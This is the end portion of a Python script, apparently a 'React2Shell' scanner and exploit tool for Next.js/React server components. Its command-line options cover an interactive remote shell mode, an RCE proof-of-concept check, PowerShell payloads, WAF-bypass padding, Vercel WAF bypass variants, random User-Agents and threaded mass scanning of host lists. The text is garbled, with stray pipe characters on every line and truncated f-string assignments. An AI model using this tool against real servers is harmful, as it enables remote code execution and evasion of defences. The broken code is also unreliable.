html_rows = "" |
|
for r in results: |
|
status_class = "vuln" if r.get("vulnerable") else "safe" |
|
html_rows += f |
|
|
|
html_content = f |
|
with open(output_file, "w") as f: |
|
f.write(html_content) |
|
console.print(f"\n[+] Results saved to: {output_file}", style="success") |
|
except Exception as e: |
|
console.print(f"\n[ERROR] Failed to save results: {e}", style="error") |
|
|
|
def print_result(result: dict, verbose: bool = False): |
|
host = result["host"] |
|
final_url = result.get("final_url") |
|
tested_url = result.get("tested_url") |
|
|
|
redirected = final_url and tested_url and final_url != tested_url |
|
status_code = result.get('status_code') |
|
|
|
response_headers = "" |
|
if result.get("response"): |
|
lines = result["response"].split("\r\n") |
|
for line in lines: |
|
lower_line = line.lower() |
|
if lower_line.startswith(("server:", "x-vercel-id:", "via:", "x-cache:")): |
|
response_headers += f"\n {line}" |
|
|
|
if result["vulnerable"] is True: |
|
msg = f"[vuln][VULNERABLE][/vuln] {host} - Status: {status_code}" |
|
if redirected: |
|
msg += f"\n -> Redirected to: {final_url}" |
|
console.print(msg) |
|
|
|
elif result["vulnerable"] is False: |
|
if status_code == 500 and result.get("potential_bypass"): |
|
console.print(f"[warning][POTENTIAL BYPASS / SERVER ERROR][/warning] {host} - Status: 500", style="warning") |
|
console.print(f" [!] WAF might have been bypassed but payload failed execution.", style="info") |
|
else: |
|
msg = f"[safe][NOT VULNERABLE][/safe] {host}" |
|
if status_code is not None: |
|
msg += f" - Status: {status_code}" |
|
else: |
|
error_msg = result.get("error", "") |
|
if error_msg: |
|
msg += f" - {error_msg}" |
|
console.print(msg) |
|
|
|
if redirected and verbose: |
|
msg += f"\n -> Redirected to: {final_url}" |
|
|
|
else: |
|
error_msg = result.get("error", "Unknown error") |
|
console.print(f"[warning][ERROR][/warning] {host} - {error_msg}") |
|
|
|
if verbose or status_code == 500: |
|
if response_headers: |
|
console.print(" Headers Analysis:", style="cyan") |
|
console.print(response_headers) |
|
|
|
if result.get("response"): |
|
console.print(" Response snippet:", style="info") |
|
response_text = result["response"] |
|
|
|
parts = response_text.split("\r\n\r\n", 1) |
|
if len(parts) > 1: |
|
|
|
console.print(f" {parts[1][:500]}") |
|
else: |
|
lines = response_text.split("\r\n")[:20] |
|
for line in lines: |
|
console.print(f" {line}") |
|
|
|
def main(): |
|
parser = argparse.ArgumentParser( |
|
description="React2Shell Scanner", |
|
formatter_class=argparse.RawDescriptionHelpFormatter |
|
) |
|
|
|
input_group = parser.add_mutually_exclusive_group(required=True) |
|
input_group.add_argument( |
|
"-u", "--url", |
|
help="Single URL/host to check" |
|
) |
|
input_group.add_argument( |
|
"-l", "--list", |
|
help="File containing list of hosts (one per line)" |
|
) |
|
|
|
parser.add_argument( |
|
"--exploit", |
|
action="store_true", |
|
help="Enter interactive shell mode (requires -u)" |
|
) |
|
|
|
parser.add_argument( |
|
"--nextjs-rsc-source-code-disclosure", |
|
action="store_true", |
|
help="Check for Next.js RSC Server Function Source Code Disclosure (CVE-2025-55183)" |
|
) |
|
|
|
parser.add_argument( |
|
"-t", "--threads", |
|
type=int, |
|
default=10, |
|
help="Number of concurrent threads (default: 10)" |
|
) |
|
|
|
parser.add_argument( |
|
"--timeout", |
|
type=int, |
|
default=10, |
|
help="Request timeout in seconds (default: 10)" |
|
) |
|
|
|
parser.add_argument( |
|
"-o", "--output", |
|
help="Output file for results" |
|
) |
|
|
|
parser.add_argument( |
|
"--format", |
|
choices=["json", "csv", "html"], |
|
default="json", |
|
help="Output format (default: json)" |
|
) |
|
|
|
parser.add_argument( |
|
"--all-results", |
|
action="store_true", |
|
help="Save all results to output file, not just vulnerable hosts" |
|
) |
|
|
|
parser.add_argument( |
|
"-k", "--insecure", |
|
default=True, |
|
action="store_true", |
|
help="Disable SSL certificate verification" |
|
) |
|
|
|
parser.add_argument( |
|
"-H", "--header", |
|
action="append", |
|
dest="headers", |
|
metavar="HEADER", |
|
help="Custom header in 'Key: Value' format (can be used multiple times)" |
|
) |
|
|
|
parser.add_argument( |
|
"-v", "--verbose", |
|
action="store_true", |
|
help="Verbose output (show response snippets for all hosts)" |
|
) |
|
|
|
parser.add_argument( |
|
"-q", "--quiet", |
|
action="store_true", |
|
help="Quiet mode (only show vulnerable hosts)" |
|
) |
|
|
|
parser.add_argument( |
|
"--no-color", |
|
action="store_true", |
|
help="Disable colored output" |
|
) |
|
|
|
parser.add_argument( |
|
"--safe-check", |
|
action="store_true", |
|
help="Use safe side-channel detection instead of RCE PoC" |
|
) |
|
|
|
parser.add_argument( |
|
"--windows", |
|
action="store_true", |
|
help="Use Windows PowerShell payload instead of Unix shell" |
|
) |
|
|
|
parser.add_argument( |
|
"--waf-bypass", |
|
action="store_true", |
|
help="Add junk data to bypass WAF content inspection (default: 128KB)" |
|
) |
|
|
|
parser.add_argument( |
|
"--waf-bypass-size", |
|
type=int, |
|
default=128, |
|
metavar="KB", |
|
help="Size of junk data in KB for WAF bypass (default: 128)" |
|
) |
|
|
|
parser.add_argument( |
|
"--vercel-waf-bypass", |
|
action="store_true", |
|
help="Use Vercel WAF bypass payload variant" |
|
) |
|
|
|
parser.add_argument( |
|
"--bypass-variant", |
|
help="Select specific WAF bypass variant (1-100) or 'all' to try all variants when --vercel-waf-bypass is used" |
|
) |
|
|
|
parser.add_argument( |
|
"--path", |
|
action="append", |
|
dest="paths", |
|
help="Custom path to test (e.g., '/_next', '/api'). Can be used multiple times to test multiple paths" |
|
) |
|
|
|
parser.add_argument( |
|
"--path-file", |
|
help="File containing list of paths to test (one per line, e.g., '/_next', '/api')" |
|
) |
|
|
|
parser.add_argument( |
|
"-x", "--proxy", |
|
help="Proxy URL (e.g., http://127.0.0.1:8080)" |
|
) |
|
|
|
parser.add_argument( |
|
"--random-agent", |
|
action="store_true", |
|
help="Use random User-Agent for each request" |
|
) |
|
|
|
parser.add_argument( |
|
"--delay", |
|
type=float, |
|
default=0, |
|
help="Delay between requests in seconds" |
|
) |
|
|
|
args = parser.parse_args() |
|
|
|
if args.no_color or not sys.stdout.isatty(): |
|
Colors.RED = "" |
|
Colors.GREEN = "" |
|
Colors.YELLOW = "" |
|
Colors.BLUE = "" |
|
Colors.MAGENTA = "" |
|
Colors.CYAN = "" |
|
Colors.WHITE = "" |
|
Colors.BOLD = "" |
|
Colors.RESET = "" |
|
|
|
if not args.quiet: |
|
print_banner() |
|
|
|
if args.url: |
|
hosts = [args.url] |
|
else: |
|
hosts = load_hosts(args.list) |
|
|
|
if not hosts: |
|
print(colorize("[ERROR] No hosts to scan", Colors.RED)) |
|
sys.exit(1) |
|
|
|
if args.exploit: |
|
if len(hosts) > 1: |
|
print(colorize("[ERROR] Exploit mode only supports single host (-u)", Colors.RED)) |
|
sys.exit(1) |
|
|
|
custom_headers = parse_headers(args.headers) |
|
proxies = None |
|
if args.proxy: |
|
proxies = {"http": args.proxy, "https": args.proxy} |
|
|
|
interactive_shell( |
|
hosts[0], |
|
args.timeout, |
|
not args.insecure, |
|
proxies=proxies, |
|
windows=args.windows, |
|
waf_bypass=args.waf_bypass, |
|
waf_bypass_size_kb=args.waf_bypass_size, |
|
custom_headers=custom_headers, |
|
random_agent=args.random_agent, |
|
vercel_waf_bypass=args.vercel_waf_bypass, |
|
bypass_variant=args.bypass_variant |
|
) |
|
sys.exit(0) |
|
|
|
if args.nextjs_rsc_source_code_disclosure: |
|
custom_headers = parse_headers(args.headers) |
|
proxies = None |
|
if args.proxy: |
|
proxies = {"http": args.proxy, "https": args.proxy} |
|
|
|
for host in hosts: |
|
check_cve_2025_55183(host, args.timeout, not args.insecure, proxies=proxies, custom_headers=custom_headers, random_agent=args.random_agent) |
|
sys.exit(0) |
|
|
|
paths = None |
|
if args.path_file: |
|
paths = load_paths(args.path_file) |
|
elif args.paths: |
|
paths = [] |
|
for path in args.paths: |
|
|
|
if not path.startswith("/"): |
|
path = "/" + path |
|
paths.append(path) |
|
|
|
timeout = args.timeout |
|
if args.waf_bypass and args.timeout == 10: |
|
timeout = 20 |
|
|
|
proxies = None |
|
if args.proxy: |
|
proxies = {"http": args.proxy, "https": args.proxy} |
|
|
|
if not args.quiet: |
|
console.print(f"[*] Loaded {len(hosts)} host(s) to scan", style="info") |
|
if paths: |
|
console.print(f"[*] Testing {len(paths)} path(s): {', '.join(paths)}", style="info") |
|
console.print(f"[*] Using {args.threads} thread(s)", style="info") |
|
console.print(f"[*] Timeout: {timeout}s", style="info") |
|
if args.safe_check: |
|
console.print("[*] Using safe side-channel check", style="info") |
|
else: |
|
console.print("[*] Using RCE PoC check", style="info") |
|
if args.windows: |
|
console.print("[*] Windows mode enabled (PowerShell payload)", style="info") |
|
if args.waf_bypass: |
|
console.print(f"[*] WAF bypass enabled ({args.waf_bypass_size}KB junk data)", style="info") |
|
if args.vercel_waf_bypass: |
|
console.print("[*] Vercel WAF bypass mode enabled", style="info") |
|
if args.insecure: |
|
console.print("[!] SSL verification disabled", style="warning") |
|
|
|
if args.proxy: |
|
console.print(f"[*] Using Proxy: {args.proxy}", style="info") |
|
if args.random_agent: |
|
console.print("[*] Random User-Agent enabled", style="info") |
|
if args.delay > 0: |
|
console.print(f"[*] Delay {args.delay}s between requests", style="info") |
|
|
|
console.print() |
|
|
|
results = [] |
|
vulnerable_count = 0 |
|
potential_bypass_count = 0 |
|
error_count = 0 |
|
|
|
verify_ssl = not args.insecure |
|
custom_headers = parse_headers(args.headers) |
|
|
|
if args.insecure: |
|
import urllib3 |
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
|
|
|
if len(hosts) == 1: |
|
|
|
variants_to_test = [] |
|
if args.bypass_variant == 'all': |
|
variants_to_test = list(range(1, 103)) |
|
elif args.bypass_variant: |
|
try: |
|
variants_to_test = [int(args.bypass_variant)] |
|
except ValueError: |
|
console.print(f"[error] Invalid variant: {args.bypass_variant}[/error]", style="error") |
|
sys.exit(1) |
|
else: |
|
|
|
variants_to_test = [None] |
|
|
|
for v in variants_to_test: |
|
if v is not None and not args.quiet: |
|
console.print(f"[*] Testing Variant: {v}", style="info") |
|
|
|
result = check_vulnerability(hosts[0], timeout, verify_ssl, custom_headers=custom_headers, safe_check=args.safe_check, windows=args.windows, waf_bypass=args.waf_bypass, waf_bypass_size_kb=args.waf_bypass_size, vercel_waf_bypass=args.vercel_waf_bypass, bypass_variant=v, paths=paths, proxies=proxies, delay=args.delay, random_agent=args.random_agent) |
|
results.append(result) |
|
|
|
if result["vulnerable"]: |
|
vulnerable_count += 1 |
|
if not args.quiet: |
|
print_result(result, args.verbose) |
|
|
|
elif result.get("potential_bypass"): |
|
potential_bypass_count += 1 |
|
if not args.quiet: |
|
|
|
console.print(f"[yellow][POTENTIAL BYPASS / SERVER ERROR] {hosts[0]} - Status: {result['status_code']}[/yellow]") |
|
console.print(" [!] WAF might have been bypassed but payload failed execution.") |
|
if args.verbose: |
|
|
|
snippet = result.get("response", "") |
|
|
|
m = re.search(r'digest":"(\d+)"', snippet) |
|
if m: |
|
console.print(f" Digest: {m.group(1)}") |
|
else: |
|
console.print(f" Response snippet:\n {snippet[:200]}") |
|
|
|
elif result.get("error"): |
|
error_count += 1 |
|
if not args.quiet: |
|
print_result(result, args.verbose) |
|
|
|
else: |
|
if not args.quiet: |
|
print_result(result, args.verbose) |
|
else: |
|
|
|
with ThreadPoolExecutor(max_workers=args.threads) as executor: |
|
futures = { |
|
executor.submit(check_vulnerability, host, timeout, verify_ssl, custom_headers=custom_headers, safe_check=args.safe_check, windows=args.windows, waf_bypass=args.waf_bypass, waf_bypass_size_kb=args.waf_bypass_size, vercel_waf_bypass=args.vercel_waf_bypass, bypass_variant=args.bypass_variant, paths=paths, proxies=proxies, delay=args.delay, random_agent=args.random_agent, follow_redirects=True): host |
|
for host in hosts |
|
} |
|
|
|
with Progress( |
|
SpinnerColumn(), |
|
TextColumn("[progress.description]{task.description}"), |
|
BarColumn(), |
|
TaskProgressColumn(), |
|
console=console, |
|
transient=True, |
|
disable=args.quiet |
|
) as progress: |
|
task = progress.add_task("[cyan]Scanning...", total=len(hosts)) |
|
|
|
for future in as_completed(futures): |
|
result = future.result() |
|
results.append(result) |
|
|
|
if result["vulnerable"]: |
|
vulnerable_count += 1 |
|
print_result(result, args.verbose) |
|
elif result["error"]: |
|
error_count += 1 |
|
if not args.quiet and args.verbose: |
|
print_result(result, args.verbose) |
|
elif not args.quiet and args.verbose: |
|
print_result(result, args.verbose) |
|
|
|
progress.update(task, advance=1) |
|
|
|
if not args.quiet: |
|
console.print() |
|
table = Table(title="Scan Summary", show_header=True, header_style="bold magenta") |
|
table.add_column("Category", style="cyan") |
|
table.add_column("Count", justify="right") |
|
|
|
table.add_row("Total Scanned", str(len(results))) |
|
table.add_row("Vulnerable", f"[bold red]{vulnerable_count}[/bold red]" if vulnerable_count > 0 else "0") |
|
table.add_row("Potential Bypass", f"[yellow]{potential_bypass_count}[/yellow]" if potential_bypass_count > 0 else "0") |
|
table.add_row("Not Vulnerable", str(len(results) - vulnerable_count - potential_bypass_count - error_count)) |
|
table.add_row("Errors", str(error_count)) |
|
|
|
console.print(table) |
|
console.print() |
|
|
|
if args.output: |
|
save_results(results, args.output, file_format=args.format, vulnerable_only=not args.all_results) |
|
|
|
if vulnerable_count > 0: |
|
sys.exit(1) |
|
sys.exit(0) |
|
|
|
if __name__ == "__main__": |
|
try: |
|
main() |
|
except KeyboardInterrupt: |
|
console.print(f"\n[warning][!] Scan interrupted by user[/warning]") |
|
sys.exit(0) |
|
except Exception as e: |
|
console.print(f"\n[error][ERROR] An unexpected error occurred: {e}[/error]") |
|
sys.exit(1) |